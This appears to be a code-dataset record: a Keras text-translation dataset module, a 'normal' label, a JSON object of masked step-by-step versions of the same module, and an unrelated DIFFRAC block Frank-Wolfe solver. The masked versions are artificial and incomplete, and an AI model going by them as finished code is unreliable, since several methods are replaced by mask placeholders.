self._validate()
if shuffle:
self.shuffle(seed)
def _validate(self) -> None:
src_len = len(self.source)
target_len = len(self.target)
if src_len != target_len:
raise TypeError('Number of source rows ({}) does not match '
'the number of target rows ({})'.format(src_len,
target_len))
def shuffle(self, seed: int=42) -> None:
np.random.seed(seed)
shuffled_indexes = np.random.permutation(len(self.source))
self.source = self.source[shuffled_indexes]
self.target = self.target[shuffled_indexes]
class TokenizerPair(SourceTargetMixin):
def __init__(self, tokenizer_class=Tokenizer):
self.source = tokenizer_class()
self.target = tokenizer_class()
@property
def is_tokenized(self) -> bool:
return hasattr(self.source, 'word_index') \
and hasattr(self.target, 'word_index')
@cached_property
def target_index_word(self):
return {v: k for k, v in self.target.word_index.items()}
class TextDataset(BaseDataset):
def __init__(self, source_sentences: Union[Iterable, Sized],
target_sentences: Union[Iterable, Sized],
shuffle: bool=True, word_frequency_threshold: int=2):
super().__init__(source_sentences, target_sentences, shuffle)
self.word_frequency_threshold = word_frequency_threshold
self.tokenizer_pair = TokenizerPair()
@cached_property
def translation_references(self):
references = defaultdict(list)
for idx, sentence in enumerate(self.source):
split_sentence = text_to_word_sequence(self.target[idx])
references[sentence].append(split_sentence)
return references
@property
def source_max_sentence_length(self) -> int:
return self.max_sentence_length('source')
@property
def target_max_sentence_length(self) -> int:
return self.max_sentence_length('target')
@property
def source_vocab_size(self) -> int:
return self.tokenizer_pair.source.num_words
@property
def target_vocab_size(self) -> int:
return self.tokenizer_pair.target.num_words
def get_vocab_size(self, level: str) -> int:
if not self.tokenizer_pair.is_tokenized:
raise ValueError('Dataset has not been tokenized yet')
return len(self.tokenizer_pair[level].word_index) + 1
def max_sentence_length(self, level: str) -> int:
return max(len(line.split()) for line in self[level])
def tokenize(self) -> None:
if not self.tokenizer_pair.is_tokenized:
self.tokenizer_pair['source'].fit_on_texts(self.source)
self.tokenizer_pair['target'].fit_on_texts(self.target)
# limit number of words returned from tokenizer
# according to frequency threshold
self.tokenizer_pair['source'].num_words = len(
[word for word, count
in self.tokenizer_pair['source'].word_counts.items()
if count > self.word_frequency_threshold - 1]
)
self.tokenizer_pair['target'].num_words = len(
[word for word, count
in self.tokenizer_pair['target'].word_counts.items()
if count > self.word_frequency_threshold - 1]
)
def get_sequences(self, level: str) -> np.ndarray:
if not self.tokenizer_pair.is_tokenized:
self.tokenize()
sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])
return pad_sequences(
sentences, maxlen=self.max_sentence_length(level), padding='post'
)
def encode_output(self, sequences: np.array) -> np.array:
return to_categorical(sequences, self.target_vocab_size)
def sequence_to_sentence(self, sequence: Iterable) -> str:
target_sentence = [
self.tokenizer_pair.target_index_word.get(word_index, '')
for word_index in sequence
]
return ' '.join(target_sentence)
def sentence_to_sequence(self, sentence: str) -> np.ndarray:
return pad_sequences(
self.tokenizer_pair['source'].texts_to_sequences([sentence]),
self.max_sentence_length('source'), padding='post'
)
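# Illustrative usage sketch (not part of the original module); the sentence
# pairs below are made-up toy data standing in for a real parallel corpus.
if __name__ == '__main__':
    src = np.array(['hello world', 'good morning', 'hello there'])
    tgt = np.array(['bonjour monde', 'bon matin', 'bonjour toi'])
    dataset = TextDataset(src, tgt, shuffle=False, word_frequency_threshold=1)
    x = dataset.get_sequences('source')
    y = dataset.get_sequences('target')
    print(x.shape, y.shape)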
|
normal
|
{
"blob_id": "e5d7cc65041d65f915d4882b4fdad5bebf79a067",
"index": 204,
"step-1": "<mask token>\n\n\nclass TextDataset(BaseDataset):\n\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized], shuffle: bool=True,\n word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) ->int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) ->int:\n return self.max_sentence_length('target')\n <mask token>\n\n @property\n def target_vocab_size(self) ->int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) ->int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n <mask token>\n\n def tokenize(self) ->None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n self.tokenizer_pair['source'].num_words = len([word for word,\n count in self.tokenizer_pair['source'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n self.tokenizer_pair['target'].num_words = len([word for word,\n count in self.tokenizer_pair['target'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n\n def get_sequences(self, level: str) ->np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n return pad_sequences(sentences, maxlen=self.max_sentence_length(\n level), padding='post')\n\n def encode_output(self, sequences: np.array) ->np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) ->str:\n target_sentence = [self.tokenizer_pair.target_index_word.get(\n word_index, '') for word_index in sequence]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) ->np.ndarray:\n return pad_sequences(self.tokenizer_pair['source'].\n texts_to_sequences([sentence]), self.max_sentence_length(\n 'source'), padding='post')\n",
"step-2": "<mask token>\n\n\nclass BaseDataset(SourceTargetMixin):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TokenizerPair(SourceTargetMixin):\n\n def __init__(self, tokenizer_class=Tokenizer):\n self.source = tokenizer_class()\n self.target = tokenizer_class()\n\n @property\n def is_tokenized(self) ->bool:\n return hasattr(self.source, 'word_index') and hasattr(self.target,\n 'word_index')\n\n @cached_property\n def target_index_word(self):\n return {v: k for k, v in self.target.word_index.items()}\n\n\nclass TextDataset(BaseDataset):\n\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized], shuffle: bool=True,\n word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) ->int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) ->int:\n return self.max_sentence_length('target')\n\n @property\n def source_vocab_size(self) ->int:\n return self.tokenizer_pair.source.num_words\n\n @property\n def target_vocab_size(self) ->int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) ->int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n\n def max_sentence_length(self, level: str) ->int:\n return max(len(line.split()) for line in self[level])\n\n def tokenize(self) ->None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n self.tokenizer_pair['source'].num_words = len([word for word,\n count in self.tokenizer_pair['source'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n self.tokenizer_pair['target'].num_words = len([word for word,\n count in self.tokenizer_pair['target'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n\n def get_sequences(self, level: str) ->np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n return pad_sequences(sentences, maxlen=self.max_sentence_length(\n level), padding='post')\n\n def encode_output(self, sequences: np.array) ->np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) ->str:\n target_sentence = [self.tokenizer_pair.target_index_word.get(\n word_index, '') for word_index in sequence]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) ->np.ndarray:\n return pad_sequences(self.tokenizer_pair['source'].\n texts_to_sequences([sentence]), self.max_sentence_length(\n 'source'), padding='post')\n",
"step-3": "<mask token>\n\n\nclass BaseDataset(SourceTargetMixin):\n\n def __init__(self, source: Union[Iterable, Sized], target: Union[\n Iterable, Sized], shuffle: bool=True, seed: int=42):\n self.source = source\n self.target = target\n self._validate()\n if shuffle:\n self.shuffle(seed)\n <mask token>\n <mask token>\n\n\nclass TokenizerPair(SourceTargetMixin):\n\n def __init__(self, tokenizer_class=Tokenizer):\n self.source = tokenizer_class()\n self.target = tokenizer_class()\n\n @property\n def is_tokenized(self) ->bool:\n return hasattr(self.source, 'word_index') and hasattr(self.target,\n 'word_index')\n\n @cached_property\n def target_index_word(self):\n return {v: k for k, v in self.target.word_index.items()}\n\n\nclass TextDataset(BaseDataset):\n\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized], shuffle: bool=True,\n word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) ->int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) ->int:\n return self.max_sentence_length('target')\n\n @property\n def source_vocab_size(self) ->int:\n return self.tokenizer_pair.source.num_words\n\n @property\n def target_vocab_size(self) ->int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) ->int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n\n def max_sentence_length(self, level: str) ->int:\n return max(len(line.split()) for line in self[level])\n\n def tokenize(self) ->None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n self.tokenizer_pair['source'].num_words = len([word for word,\n count in self.tokenizer_pair['source'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n self.tokenizer_pair['target'].num_words = len([word for word,\n count in self.tokenizer_pair['target'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n\n def get_sequences(self, level: str) ->np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n return pad_sequences(sentences, maxlen=self.max_sentence_length(\n level), padding='post')\n\n def encode_output(self, sequences: np.array) ->np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) ->str:\n target_sentence = [self.tokenizer_pair.target_index_word.get(\n word_index, '') for word_index in sequence]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) ->np.ndarray:\n return pad_sequences(self.tokenizer_pair['source'].\n texts_to_sequences([sentence]), self.max_sentence_length(\n 'source'), padding='post')\n",
"step-4": "<mask token>\n\n\nclass BaseDataset(SourceTargetMixin):\n\n def __init__(self, source: Union[Iterable, Sized], target: Union[\n Iterable, Sized], shuffle: bool=True, seed: int=42):\n self.source = source\n self.target = target\n self._validate()\n if shuffle:\n self.shuffle(seed)\n\n def _validate(self) ->None:\n src_len = len(self.source)\n target_len = len(self.target)\n if src_len != target_len:\n raise TypeError(\n 'Number of source rows ({}) does not match the number of target rows ({})'\n .format(src_len, target_len))\n\n def shuffle(self, seed: int=42) ->None:\n np.random.seed(seed)\n shuffled_indexes = np.random.permutation(len(self.source))\n self.source = self.source[shuffled_indexes]\n self.target = self.target[shuffled_indexes]\n\n\nclass TokenizerPair(SourceTargetMixin):\n\n def __init__(self, tokenizer_class=Tokenizer):\n self.source = tokenizer_class()\n self.target = tokenizer_class()\n\n @property\n def is_tokenized(self) ->bool:\n return hasattr(self.source, 'word_index') and hasattr(self.target,\n 'word_index')\n\n @cached_property\n def target_index_word(self):\n return {v: k for k, v in self.target.word_index.items()}\n\n\nclass TextDataset(BaseDataset):\n\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized], shuffle: bool=True,\n word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) ->int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) ->int:\n return self.max_sentence_length('target')\n\n @property\n def source_vocab_size(self) ->int:\n return self.tokenizer_pair.source.num_words\n\n @property\n def target_vocab_size(self) ->int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) ->int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n\n def max_sentence_length(self, level: str) ->int:\n return max(len(line.split()) for line in self[level])\n\n def tokenize(self) ->None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n self.tokenizer_pair['source'].num_words = len([word for word,\n count in self.tokenizer_pair['source'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n self.tokenizer_pair['target'].num_words = len([word for word,\n count in self.tokenizer_pair['target'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n\n def get_sequences(self, level: str) ->np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n return pad_sequences(sentences, maxlen=self.max_sentence_length(\n level), padding='post')\n\n def encode_output(self, sequences: np.array) ->np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) ->str:\n target_sentence = 
[self.tokenizer_pair.target_index_word.get(\n word_index, '') for word_index in sequence]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) ->np.ndarray:\n return pad_sequences(self.tokenizer_pair['source'].\n texts_to_sequences([sentence]), self.max_sentence_length(\n 'source'), padding='post')\n",
"step-5": "from collections import defaultdict\nfrom typing import Union, Iterable, Sized\n\nimport numpy as np\nfrom cached_property import cached_property\nfrom keras.utils import to_categorical\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer, text_to_word_sequence\n\n\nclass SourceTargetMixin:\n \"\"\"\n Allows subscription with 'source' and 'target' keywords\n \"\"\"\n def __getitem__(self, item):\n if item in ['source', 'target']:\n return getattr(self, item)\n raise TypeError('Subscription is available '\n 'only with \"source\" and \"target\" keywords')\n\n\nclass BaseDataset(SourceTargetMixin):\n def __init__(self, source: Union[Iterable, Sized],\n target: Union[Iterable, Sized],\n shuffle: bool=True, seed: int=42):\n self.source = source\n self.target = target\n self._validate()\n if shuffle:\n self.shuffle(seed)\n\n def _validate(self) -> None:\n src_len = len(self.source)\n target_len = len(self.target)\n if src_len != target_len:\n raise TypeError('Number of source rows ({}) does not match '\n 'the number of target rows ({})'.format(src_len,\n target_len))\n\n def shuffle(self, seed: int=42) -> None:\n np.random.seed(seed)\n shuffled_indexes = np.random.permutation(len(self.source))\n self.source = self.source[shuffled_indexes]\n self.target = self.target[shuffled_indexes]\n\n\nclass TokenizerPair(SourceTargetMixin):\n def __init__(self, tokenizer_class=Tokenizer):\n self.source = tokenizer_class()\n self.target = tokenizer_class()\n\n @property\n def is_tokenized(self) -> bool:\n return hasattr(self.source, 'word_index') \\\n and hasattr(self.target, 'word_index')\n\n @cached_property\n def target_index_word(self):\n return {v: k for k, v in self.target.word_index.items()}\n\n\nclass TextDataset(BaseDataset):\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized],\n shuffle: bool=True, word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) -> int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) -> int:\n return self.max_sentence_length('target')\n\n @property\n def source_vocab_size(self) -> int:\n return self.tokenizer_pair.source.num_words\n\n @property\n def target_vocab_size(self) -> int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) -> int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n\n def max_sentence_length(self, level: str) -> int:\n return max(len(line.split()) for line in self[level])\n\n def tokenize(self) -> None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n\n # limit number of words returned from tokenizer\n # according to frequency threshold\n self.tokenizer_pair['source'].num_words = len(\n [word for word, count\n in self.tokenizer_pair['source'].word_counts.items()\n if count > 
self.word_frequency_threshold - 1]\n )\n\n self.tokenizer_pair['target'].num_words = len(\n [word for word, count\n in self.tokenizer_pair['target'].word_counts.items()\n if count > self.word_frequency_threshold - 1]\n )\n\n def get_sequences(self, level: str) -> np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n\n return pad_sequences(\n sentences, maxlen=self.max_sentence_length(level), padding='post'\n )\n\n def encode_output(self, sequences: np.array) -> np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) -> str:\n target_sentence = [\n self.tokenizer_pair.target_index_word.get(word_index, '')\n for word_index in sequence\n ]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) -> np.ndarray:\n return pad_sequences(\n self.tokenizer_pair['source'].texts_to_sequences([sentence]),\n self.max_sentence_length('source'), padding='post'\n )\n",
"step-ids": [
12,
19,
20,
22,
27
]
}
|
[
12,
19,
20,
22,
27
] |
""" Implements BCFW for DIFFRAC objectives. """
import numpy as np
import os
from tqdm import tqdm
from numpy.linalg import norm as matrix_norm
import time
def get_feat_block(feats, block_idx, memory_mode, bias_value=-1.0):
"""Get feature for a given block."""
if memory_mode == 'RAM':
feat = feats[block_idx]
elif memory_mode == 'disk':
feat = np.load(feats[block_idx])
else:
raise ValueError(
'Memory mode {} is not supported.'.format(memory_mode))
if bias_value > 0.0:
feat = np.append(
feat, bias_value * np.ones([feat.shape[0], 1]), axis=1)
return feat
def get_p_block(p_matrix, block_idx, memory_mode):
if memory_mode == 'RAM':
return p_matrix[block_idx]
elif memory_mode == 'disk':
return np.load(p_matrix[block_idx])
else:
raise ValueError(
'Memory mode {} is not supported.'.format(memory_mode))
def compute_p_matrix(feats, alpha, memory_mode, bias_value=-1.0):
"""Precompute the P dictionnary matrix."""
_, d = np.shape(
get_feat_block(feats, 0, memory_mode, bias_value=bias_value))
# Compute X^TX
print('Computing xtx...')
x_t_x = np.zeros([d, d])
N = 0
for i in tqdm(range(len(feats))):
x = get_feat_block(feats, i, memory_mode, bias_value=bias_value)
x_t_x += np.dot(np.transpose(x), x)
N += x.shape[0]
# Compute P
p_matrix = []
print('Inverting big matrix...')
inv_mat = np.linalg.inv(x_t_x + N * alpha * np.eye(d))
print('Computing P matrix by block...')
for i in tqdm(range(len(feats))):
x = get_feat_block(feats, i, memory_mode, bias_value=bias_value)
sol = np.dot(inv_mat, np.transpose(x))
if memory_mode == 'RAM':
p_matrix.append(np.array(sol))
else:
path_x = feats[i]
base_path, filename = os.path.split(path_x)
np.save(os.path.join(base_path, 'P_{}'.format(filename)), sol)
p_matrix.append(path_x)
return p_matrix, N
def compute_weights(p_matrix, asgn, memory_mode):
d, _ = np.shape(get_p_block(p_matrix, 0, memory_mode))
_, k = np.shape(asgn[0])
weights = np.zeros([d, k])
print('Computing weights from scratch...')
for i in tqdm(range(len(p_matrix))):
weights += np.dot(get_p_block(p_matrix, i, memory_mode), asgn[i])
return weights
def compute_obj(x, y, weights, n_feats):
return 1.0 / n_feats * matrix_norm(np.dot(x, weights) - y, ord='fro')**2
def compute_grad(x, y, weights, n_feats):
return 1.0 / n_feats * (y - np.dot(x, weights))
def compute_gap(x,
y,
weights,
n_feats,
cstr,
cstr_solver,
opt_y=None,
grad_y=None):
# Check if we need to call the oracle.
if opt_y is None:
grad_y = compute_grad(x, y, weights, n_feats)
opt_y = cstr_solver.solve(cstr, grad_y)
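    # Frank-Wolfe (linearization) duality gap <y - opt_y, grad_y>; it is
    # non-negative whenever opt_y minimizes the linearized objective over cstr.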
gap = -np.multiply(opt_y - y, grad_y).sum()
return gap
def sample_block(gaps, block_sampling):
if block_sampling == 'uniform':
return np.random.randint(0, len(gaps), 1)[0]
elif block_sampling == 'gap_sampling':
if not np.all(gaps >= 0):
            print('Warning: some gaps are negative; block {}, value: {}'.format(
gaps.argmin(), gaps.min()))
gaps[gaps < 0] = 0.00000001
gap_prob = gaps / gaps.sum()
return np.random.choice(len(gaps), 1, p=gap_prob)[0]
def display_information(iter,
max_iter,
gaps,
eval_metric,
objective_value=None,
verbose='silent',
prev_time=-1,
prev_global_time=-1):
"""Display information about the training."""
if objective_value is None:
objective_value = []
if verbose in ['normal', 'heavy']:
string_display = 'Iteration {0:05d}/{1:05d}, Gap sum: {2:.4E}'.format(
iter, max_iter, gaps.sum())
new_time = time.time()
if prev_time > 0:
diff_time = int(round(new_time - prev_time))
string_display += ' ({:d} s)'.format(diff_time)
if prev_global_time > 0:
diff_time = int(round(new_time - prev_global_time))
string_display += ' (Glob. {:d} s)'.format(diff_time)
if eval_metric >= 0:
string_display += ', Eval metric: {:.2f}'.format(eval_metric)
if objective_value:
string_display += ', Objective: '
string_display += ','.join([
'{}: {:.4E}'.format(key, value)
for key, value in objective_value.items()
])
print(string_display)
def save_asgn_block(path_save_asgn, block_idx, asgn, t):
np.save(
os.path.join(path_save_asgn, '{0}_{1:05d}.npy'.format(block_idx, t)),
asgn[block_idx])
def save_xw_block(path_save_asgn, block_idx, x, weights, t):
np.save(
os.path.join(path_save_asgn, 'xw_{0}_{1:05d}.npy'.format(block_idx,
t)),
np.dot(x, weights))
def save_gt_block(path_save_asgn, block_idx, gts):
np.save(
os.path.join(path_save_asgn, '{}_gt.npy'.format(block_idx)),
gts[block_idx])
def solver(feats,
asgn,
cstrs,
cstrs_solver,
gts=None,
eval_function=None,
rounding_function=None,
alpha=1e-4,
memory_mode='RAM',
bias_value=-1.0,
n_iterations=10000,
block_sampling='uniform',
verbose='silent',
gap_frequency=2000,
eval_frequency=500,
verbose_frequency=250,
objective_frequency=250,
path_save_asgn=None,
validation_info=None):
"""Main solver for DiffracBCFW.
Args:
feats: Input features as a list (one entry per block).
asgn: Assignment variables as a list (one entry per block). This provides
the initialization of the system.
cstrs: Input constraints as a dictionary (one entry per block).
cstrs_solver: Method that takes as input a gradient for a block and a cstrs and then
returns the LP solution.
gts: A ground truth can be specified if you wish to evaluate your solution.
eval_function: an eval function method can be provided.
rounding_function: rounding function.
alpha: Value of the regularization parameter (lambda in the paper).
memory_mode: `disk` (features are stored in disk) or `RAM` (features are in RAM).
bias_value: Value to add for the bias (if negative no bias is added to the features).
n_iterations: Number of iterations of the solver.
block_sampling: Method for sampling block.
verbose: `silent`, `normal`, `heavy`.
gap_frequency: frequency to recompute all the gaps.
eval_frequency: frequency to perform evaluation.
verbose_frequency: frequency to print info.
objective_frequency: frequency to compute objective (only used if positive).
path_save_asgn: If not None save asgn at path_save_asgn. None by default.
      validation_info: If not None, perform evaluation on the validation set.
"""
compute_objective = False
objective_value = None
if objective_frequency > 0:
compute_objective = True
save_asgn = False
save_ids = []
if path_save_asgn is not None:
if not os.path.exists(path_save_asgn):
os.makedirs(path_save_asgn)
# Monitor evolution of asgn during optim on a subset of samples.
save_asgn = True
n_save_asgn = min(20, len(asgn))
save_ids = np.random.choice(len(asgn), n_save_asgn, replace=False)
# Pre-compute the P matrix.
p_matrix, n_feats = compute_p_matrix(
feats, alpha, memory_mode, bias_value=bias_value)
# Compute W.
weights = compute_weights(p_matrix, asgn, memory_mode=memory_mode)
# Init the gaps.
gaps = np.zeros(len(feats))
print('Computing init gaps...')
for block_idx in tqdm(range(len(feats))):
x = get_feat_block(
feats, block_idx, memory_mode, bias_value=bias_value)
gaps[block_idx] = compute_gap(x, asgn[block_idx], weights, n_feats,
cstrs[block_idx], cstrs_solver)
if save_asgn and block_idx in save_ids:
save_asgn_block(path_save_asgn, block_idx, asgn, 0)
save_xw_block(path_save_asgn, block_idx, x, weights, 0)
save_gt_block(path_save_asgn, block_idx, gts)
print('Init gap: {0:4E}, starting the optimization...'.format(gaps.sum()))
eval_metric = -1.0
prev_time = time.time() # init time of iterations
prev_global_time = prev_time
for t in range(n_iterations):
if eval_frequency > 0 and t % eval_frequency == 0:
# Evaluation.
if eval_function is not None and gts is not None:
print('Performing evaluation...')
eval_metric = eval_function.evaluate(asgn, gts, weights, feats,
rounding_function, cstrs)
if validation_info is not None:
gts_val = validation_info['gts']
feats_val = validation_info['feats']
eval_function.evaluate(None, gts_val, weights, feats_val,
rounding_function, None)
else:
eval_metric = -1.0
if compute_objective and t % objective_frequency == 0:
print('Computing objective...')
objective_value = {}
# Compute the diffrac objective.
dfrac_obj = 0.0
# Data dependent term: 1.0 / N * ||X * W - Y||_2^2
for block_idx in range(len(feats)):
x = get_feat_block(
feats, block_idx, memory_mode, bias_value=bias_value)
dfrac_obj += compute_obj(x, asgn[block_idx], weights, n_feats)
# Regularization term: \alpha * || W ||_2^2
dfrac_obj += alpha * matrix_norm(weights, ord='fro')**2
objective_value['dfrac'] = dfrac_obj
# Print information.
if t % verbose_frequency == 0:
display_information(t, n_iterations, gaps, eval_metric,
objective_value, verbose, prev_time, prev_global_time)
prev_time = time.time()
# Sample a block.
block_idx = sample_block(gaps, block_sampling)
# Compute gradient.
x = get_feat_block(
feats, block_idx, memory_mode, bias_value=bias_value)
y = asgn[block_idx]
grad_y = compute_grad(x, y, weights, n_feats)
opt_y = cstrs_solver.solve(cstrs[block_idx], grad_y)
gaps[block_idx] = compute_gap(x, y, weights, n_feats,
cstrs[block_idx], cstrs_solver,
opt_y, grad_y)
# Step size computation.
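        # Exact line-search step for the quadratic objective:
        # gamma = min(1, gap / ((1/N) * <dir_y, (I - X P) dir_y>)),
        # clipped below at zero right after.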
p = get_p_block(p_matrix, block_idx, memory_mode)
dir_y = opt_y - y
gamma_n = gaps[block_idx]
gamma_d = 1.0 / n_feats * np.multiply(
dir_y, dir_y - np.linalg.multi_dot([x, p, dir_y])).sum()
gamma = min(1.0, gamma_n / gamma_d)
# gamma should always be positive.
if gamma < 0:
            print('Warning: gamma = {}, gap_i = {}'.format(
                gamma, gaps[block_idx]))
gamma = 0.0
# Update variables.
asgn[block_idx] += gamma * dir_y
weights += gamma * np.dot(p, dir_y)
if save_asgn and block_idx in save_ids:
save_asgn_block(path_save_asgn, block_idx, asgn, t)
save_xw_block(path_save_asgn, block_idx, x, weights, t)
# Update gaps if needed.
if (t + 1) % gap_frequency == 0:
print('Recomputing gaps...')
for block_idx in tqdm(range(len(feats))):
x = get_feat_block(
feats, block_idx, memory_mode, bias_value=bias_value)
gaps[block_idx] = compute_gap(x, asgn[block_idx], weights,
n_feats, cstrs[block_idx],
cstrs_solver)
display_information(t, n_iterations, gaps, eval_metric,
objective_value, verbose)
return asgn, weights
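# Minimal usage sketch (hypothetical oracle object; the solver only requires
# that `cstrs_solver` expose a .solve(cstr, grad) method returning a feasible
# point, and that `cstrs` be indexable by block index):
#   feats = [np.random.randn(50, 16) for _ in range(4)]
#   asgn = [np.full((50, 3), 1.0 / 3) for _ in range(4)]
#   cstrs = [None] * 4  # placeholder constraint objects for the sketch
#   asgn, weights = solver(feats, asgn, cstrs, my_simplex_oracle,
#                          alpha=1e-4, n_iterations=200, verbose='normal')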
|
normal
|
{
"blob_id": "af02cd0778e19df7b11145c4863776a1afd1cca6",
"index": 1484,
"step-1": "\"\"\" Implements BCFW for DIFFRAC objectives. \"\"\"\n\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nfrom numpy.linalg import norm as matrix_norm\nimport time\n\n\ndef get_feat_block(feats, block_idx, memory_mode, bias_value=-1.0):\n \"\"\"Get feature for a given block.\"\"\"\n if memory_mode == 'RAM':\n feat = feats[block_idx]\n elif memory_mode == 'disk':\n feat = np.load(feats[block_idx])\n else:\n raise ValueError(\n 'Memory mode {} is not supported.'.format(memory_mode))\n\n if bias_value > 0.0:\n feat = np.append(\n feat, bias_value * np.ones([feat.shape[0], 1]), axis=1)\n\n return feat\n\n\ndef get_p_block(p_matrix, block_idx, memory_mode):\n if memory_mode == 'RAM':\n return p_matrix[block_idx]\n elif memory_mode == 'disk':\n return np.load(p_matrix[block_idx])\n else:\n raise ValueError(\n 'Memory mode {} is not supported.'.format(memory_mode))\n\n\ndef compute_p_matrix(feats, alpha, memory_mode, bias_value=-1.0):\n \"\"\"Precompute the P dictionnary matrix.\"\"\"\n _, d = np.shape(\n get_feat_block(feats, 